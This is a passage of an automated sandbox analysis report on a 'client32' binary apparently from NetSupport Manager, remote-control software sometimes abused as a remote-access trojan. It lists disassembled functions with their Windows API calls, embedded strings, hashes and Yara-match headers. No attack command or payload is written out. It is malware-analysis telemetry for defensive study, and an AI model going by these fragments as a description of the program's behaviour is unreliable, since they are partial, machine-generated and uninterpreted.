                                                                                                                                                                • String ID: NsAppSystem Info : Control Channel Connected To NsStudent App...$NsAppSystem Info : Control Channel Listening for Connections...$NsAppSystem Info : Control Channel Stopped Listening for Connections (37778) ListenThread Terminating)...$NsAppSystem Info : INCOMING Control Channel Connection...$NsAppSystem Info : Stopped Listening On Control Channel For Connections...
                                                                                                                                                                • API String ID: 2962855875-3381136194
                                                                                                                                                                • Opcode ID: 1b7ecb99bb46378956ba7eb88822c28ef9798db93cd3f111b1ffcc2a005beac2
                                                                                                                                                                • Instruction ID: fd97f17cd70541077184d2754658eb2bb5ea6376c841969094cbb9e24a52883a
                                                                                                                                                                • Opcode Fuzzy Hash: 1b7ecb99bb46378956ba7eb88822c28ef9798db93cd3f111b1ffcc2a005beac2
                                                                                                                                                                • Instruction Fuzzy Hash: 7C31A0B5E003869FDF00DFA89994B9EFBA1FB44708F144569D51597280EA716A04CB92
                                                                                                                                                                APIs
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110ED481
                                                                                                                                                                • _free.LIBCMT ref: 110ED49C
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • _malloc.LIBCMT ref: 110ED4AE
                                                                                                                                                                • RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED4DA
                                                                                                                                                                • _free.LIBCMT ref: 110ED563
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: QueryValue_free$ErrorFreeHeapLast_malloc
                                                                                                                                                                • String ID: Error %d getting %s
                                                                                                                                                                • API String ID: 582965682-2709163689
                                                                                                                                                                • Opcode ID: 21b90e269bb058007468a2708e5de79ddeb75680d954529505c3fa37c1052212
                                                                                                                                                                • Instruction ID: cd42bc0bb861def8ff6dbc914e14b6928e4a225feda89385fcf4a9bb75652b77
                                                                                                                                                                • Opcode Fuzzy Hash: 21b90e269bb058007468a2708e5de79ddeb75680d954529505c3fa37c1052212
                                                                                                                                                                • Instruction Fuzzy Hash: 58315076D001289BDB60DA19CC84BEEB7F9FF94344F0480E9E899A7240DE716E85CF91
                                                                                                                                                                APIs
                                                                                                                                                                • PlaySoundA.WINMM(1000,50,00000000,00020001), ref: 11143451
                                                                                                                                                                  • Part of subcall function 11163A2D: __isdigit_l.LIBCMT ref: 11163A52
                                                                                                                                                                • Beep.KERNEL32(00000000,00000000), ref: 11143415
                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 11143427
                                                                                                                                                                • MessageBeep.USER32(-00000010), ref: 1114343B
                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 1114345D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Beep$Message$PlaySound__isdigit_l
                                                                                                                                                                • String ID: 1000,50
                                                                                                                                                                • API String ID: 3904670044-1941404556
                                                                                                                                                                • Opcode ID: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                                                                                                • Instruction ID: 938a5c7d7fad482dacf885287002a424905fd2e62ab59dfe834b6d95de8c57fd
                                                                                                                                                                • Opcode Fuzzy Hash: c2824c85be99af7b01869709431b37e6f937a4a8314b06dcce6d67a3277ac74e
                                                                                                                                                                • Instruction Fuzzy Hash: 93216D66A6C6B272E60105746D847FFFF5E8F81E69F184074E87DC6982EB26E016C321
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                • String ID: ..\CTL32\configplus.cpp$result <= buflen
                                                                                                                                                                • API String ID: 2111968516-413741496
                                                                                                                                                                • Opcode ID: 1e75b457f82be356380a80b6451298dc34942034e65cfc81e57d19b8d6e8b9c2
                                                                                                                                                                • Instruction ID: 66cd83cde6406eed73dadf9a29febb3e9e016d9ffe8428f4573ae4edc325b04e
                                                                                                                                                                • Opcode Fuzzy Hash: 1e75b457f82be356380a80b6451298dc34942034e65cfc81e57d19b8d6e8b9c2
                                                                                                                                                                • Instruction Fuzzy Hash: 8E21DB75E041669BC301CF389C84DEE77ED9FC5369B14C251FDA69B685E631E904C390
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,59FD48C0,77602AF0,00000001,000000C8,11059995,?,?,00000000,?,?), ref: 11059518
                                                                                                                                                                • timeGetTime.WINMM ref: 1105954B
                                                                                                                                                                  • Part of subcall function 11142290: _strncpy.LIBCMT ref: 111422D2
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 11059594
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 1105959B
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSectionwsprintf$EnterErrorEventExitLastLeaveMessageProcessTime_malloc_memset_strncpytime
                                                                                                                                                                • String ID: CltReconn.cpp$gMain.pReconnThread
                                                                                                                                                                • API String ID: 3397837340-2390197369
                                                                                                                                                                • Opcode ID: 62f0ce4501407474e94ae8187d1c8e7f68287c587de99165efd95a88e45b781b
                                                                                                                                                                • Instruction ID: d55008317b7f58e9c03502da526e59385c1a25d3ba89ff1204f814874157006d
                                                                                                                                                                • Opcode Fuzzy Hash: 62f0ce4501407474e94ae8187d1c8e7f68287c587de99165efd95a88e45b781b
                                                                                                                                                                • Instruction Fuzzy Hash: 853182B6E04319DFD750CFA8D880B9AFBF4FB48708F10456AE925D7240E774AA40CB91
                                                                                                                                                                APIs
                                                                                                                                                                • IsWindow.USER32(?), ref: 1109D66F
                                                                                                                                                                • GetClassNameA.USER32(?,?,00000040), ref: 1109D680
                                                                                                                                                                • FindWindowA.USER32(?,00000000), ref: 1109D6C1
                                                                                                                                                                • Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,1109E8E9,000001F4,00000006,?,11066C00,0000048C,00000001), ref: 1109D6DC
                                                                                                                                                                • FindWindowA.USER32(?,00000000), ref: 1109D6ED
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Find$ClassNameSleep
                                                                                                                                                                • String ID: gfff
                                                                                                                                                                • API String ID: 1867012073-1553575800
                                                                                                                                                                • Opcode ID: f63e749aaae1211fd170dac7924bfa73fc6692fe634daa17492b9abf550c62c7
                                                                                                                                                                • Instruction ID: 4d297b605abb8e027e0f0f99cc6afa5b4bd528ddbd813a0f77330fab7f22680d
                                                                                                                                                                • Opcode Fuzzy Hash: f63e749aaae1211fd170dac7924bfa73fc6692fe634daa17492b9abf550c62c7
                                                                                                                                                                • Instruction Fuzzy Hash: 5221F676E4162D9BC701CFA8DC94A9EFBA8BF48755B050125EC08EB340DB34E902DBE0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 110D12F0: wvsprintfA.USER32(?,?,00000000), ref: 110D1322
                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 11009656
                                                                                                                                                                • WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 1100966B
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 110095D9
                                                                                                                                                                • IsA(), xrefs: 1100960D, 11009635
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009608, 11009630
                                                                                                                                                                • <tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 11009665
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                • String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                • API String ID: 863766397-389219706
                                                                                                                                                                • Opcode ID: 9e9794c30a950b6e2cb783daf9e85ace39663e75e43504d603bff2f617f2da35
                                                                                                                                                                • Instruction ID: e7c1a3c1adf9e1d7e61797cbaf1f46547dfa3f2c2d8ebb091e29c5d978d26bd4
                                                                                                                                                                • Opcode Fuzzy Hash: 9e9794c30a950b6e2cb783daf9e85ace39663e75e43504d603bff2f617f2da35
                                                                                                                                                                • Instruction Fuzzy Hash: 07214C79A40219ABDB00DFD5DD51FEEF3B8FF58618F100259E925B3680EA746904CBA4
                                                                                                                                                                APIs
                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 1100562D
                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 11005638
                                                                                                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100565A
                                                                                                                                                                • EndPaint.USER32(?,?), ref: 1100567F
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11005613
                                                                                                                                                                • m_hWnd, xrefs: 11005618
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 1216912278-2830328467
                                                                                                                                                                • Opcode ID: 0792636c57d639f49c8e83cb971f2d9e9162808fd11bc23f2160297ffd227894
                                                                                                                                                                • Instruction ID: f5aa4065951b5eb8c3932a4188ea608e1f62d63a97b0738e2bbaddb10e89198b
                                                                                                                                                                • Opcode Fuzzy Hash: 0792636c57d639f49c8e83cb971f2d9e9162808fd11bc23f2160297ffd227894
                                                                                                                                                                • Instruction Fuzzy Hash: C1119E75B40218BFE714DBA0CC85FBEB3BCEB88B19F104129F52696180EA71BD04CB64
                                                                                                                                                                APIs
                                                                                                                                                                • GetForegroundWindow.USER32(76967AA0,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9017
                                                                                                                                                                • GetCursorPos.USER32(110BFEBC), ref: 110B9026
                                                                                                                                                                  • Part of subcall function 1115E6F0: GetWindowRect.USER32(?,?), ref: 1115E70C
                                                                                                                                                                • PtInRect.USER32(110BFEBC,110BFEBC,110BFEBC), ref: 110B9044
                                                                                                                                                                • ClientToScreen.USER32(?,110BFEBC), ref: 110B9066
                                                                                                                                                                • SetCursorPos.USER32(110BFEBC,110BFEBC,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9074
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 110B9081
                                                                                                                                                                • SetCursor.USER32(00000000,?,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC,110BFEBC), ref: 110B9088
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cursor$RectWindow$ClientForegroundLoadScreen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3235510773-0
                                                                                                                                                                • Opcode ID: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                                                                                                • Instruction ID: ad301b5eb86ee9d8d5bbe419ceb9c49b4424cf1b2c79503272c3df1ff599c8d2
                                                                                                                                                                • Opcode Fuzzy Hash: 49be05b7fef80b05594cc908f0611ebf12c6680a206dc75da7e7ca7dce7ec318
                                                                                                                                                                • Instruction Fuzzy Hash: 8C112EB5E1421A9FCB08DFB4C884DBFF7B8FB84305B108669E52297244DB34E905CBA4
                                                                                                                                                                APIs
                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 1100B280
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2B9
                                                                                                                                                                • EnterCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2D8
                                                                                                                                                                  • Part of subcall function 1100A1D0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A1EE
                                                                                                                                                                  • Part of subcall function 1100A1D0: DeviceIoControl.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 1100A218
                                                                                                                                                                  • Part of subcall function 1100A1D0: GetLastError.KERNEL32 ref: 1100A220
                                                                                                                                                                  • Part of subcall function 1100A1D0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A234
                                                                                                                                                                  • Part of subcall function 1100A1D0: CloseHandle.KERNEL32(00000000), ref: 1100A23B
                                                                                                                                                                • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BE6B,?,00000000,00000002), ref: 1100B2E8
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,1100BE6B,?,00000000,00000002), ref: 1100B2EF
                                                                                                                                                                • _free.LIBCMT ref: 1100B2F8
                                                                                                                                                                • _free.LIBCMT ref: 1100B2FE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 705253285-0
                                                                                                                                                                • Opcode ID: 79ddf153cfec84683290dd42533ea7b8c8eeaab96dddec7867e8baf6a8b692f2
                                                                                                                                                                • Instruction ID: 1708c8f2d16fe6171f6400e7ced1c046c931d624ac1b1599b235a4591b72ed62
                                                                                                                                                                • Opcode Fuzzy Hash: 79ddf153cfec84683290dd42533ea7b8c8eeaab96dddec7867e8baf6a8b692f2
                                                                                                                                                                • Instruction Fuzzy Hash: 06117075904719ABE711CE70CC88BEFB3ECEB48399F000529FA6656144D774B545CB61
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1101D0FE
                                                                                                                                                                • LoadIconA.USER32(00000000,0000139A), ref: 1101D14F
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 1101D15F
                                                                                                                                                                • RegisterClassExA.USER32(00000030), ref: 1101D181
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1101D187
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 430917334-4108050209
                                                                                                                                                                • Opcode ID: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                                                                                                • Instruction ID: 594e7871e039520b7580a936d726e641a3743c14917196a6b4ce4aa29f199296
                                                                                                                                                                • Opcode Fuzzy Hash: a999cde5bf51422c53d54c5e2b81da0a739011e508cf178ac43a94cfc9df5e13
                                                                                                                                                                • Instruction Fuzzy Hash: 9C018C74C1431DABEF00EFF0C899BDEFBB8AB04708F104029E521BA284E7BA51048F95
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,111DBF48,00000008,1116B790,00000000,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 1116B699
                                                                                                                                                                • __lock.LIBCMT ref: 1116B6CD
                                                                                                                                                                  • Part of subcall function 1117373C: __mtinitlocknum.LIBCMT ref: 11173752
                                                                                                                                                                  • Part of subcall function 1117373C: __amsg_exit.LIBCMT ref: 1117375E
                                                                                                                                                                  • Part of subcall function 1117373C: EnterCriticalSection.KERNEL32(?,?,?,1116B6D2,0000000D), ref: 11173766
                                                                                                                                                                • InterlockedIncrement.KERNEL32(111EBF10), ref: 1116B6DA
                                                                                                                                                                • __lock.LIBCMT ref: 1116B6EE
                                                                                                                                                                • ___addlocaleref.LIBCMT ref: 1116B70C
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                • String ID: KERNEL32.DLL
                                                                                                                                                                • API String ID: 637971194-2576044830
                                                                                                                                                                APIs
                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EFD), ref: 1100331D
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 11003372
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                • API String ID: 468487828-934300333
                                                                                                                                                                APIs
                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EF1), ref: 1100340D
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 11003433
                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 11003462
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                                                                • API String ID: 468487828-934300333
                                                                                                                                                                APIs
                                                                                                                                                                • GetActiveWindow.USER32 ref: 110B9957
                                                                                                                                                                • UpdateWindow.USER32(?), ref: 110B999C
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 110B99AF
                                                                                                                                                                • PostThreadMessageA.USER32(00000000,?,110BFD1E,00000000), ref: 110B99B6
                                                                                                                                                                  • Part of subcall function 1115AF30: BringWindowToTop.USER32(00000000), ref: 1115AF4F
                                                                                                                                                                Strings
                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110B9986
                                                                                                                                                                • m_hWnd, xrefs: 110B998B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$Thread$ActiveBringCurrentMessagePostUpdate
                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 3644473228-2830328467
                                                                                                                                                                APIs
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1115F636
                                                                                                                                                                • _free.LIBCMT ref: 1115F64B
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • _free.LIBCMT ref: 1115F654
                                                                                                                                                                • _free.LIBCMT ref: 1115F65D
                                                                                                                                                                • _free.LIBCMT ref: 1115F666
                                                                                                                                                                • _free.LIBCMT ref: 1115F66F
                                                                                                                                                                • InterlockedDecrement.KERNEL32(111EB0C0), ref: 1115F67C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$DecrementDeleteErrorFreeHeapInterlockedLastObject
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 354521468-0
                                                                                                                                                                • Opcode ID: 5fd69fe185bfdf14846da3b8fb65dc386c05d21111fa9652539bbad59113f25c
                                                                                                                                                                • Instruction ID: 4c42a85c9acf0e90f0463cd1b2829a5c81afa7e4bb4e6f88478351abcbf2859f
                                                                                                                                                                • Opcode Fuzzy Hash: 5fd69fe185bfdf14846da3b8fb65dc386c05d21111fa9652539bbad59113f25c
                                                                                                                                                                • Instruction Fuzzy Hash: 1BF08C7A504716ABCA24AFF5DC84C97F7ACEF0C29C3004A08F5A287504DA72F811CBB9
                                                                                                                                                                APIs
                                                                                                                                                                • OpenThread.KERNEL32(0000004A,00000000,11147278,?,?,?,?,?,11147278), ref: 1114713A
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00001000,111470B0,?,00000000,?), ref: 1114715E
                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
                                                                                                                                                                • GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 180989782-0
                                                                                                                                                                • Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                                                                                                • Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
                                                                                                                                                                • Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
                                                                                                                                                                • Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
                                                                                                                                                                APIs
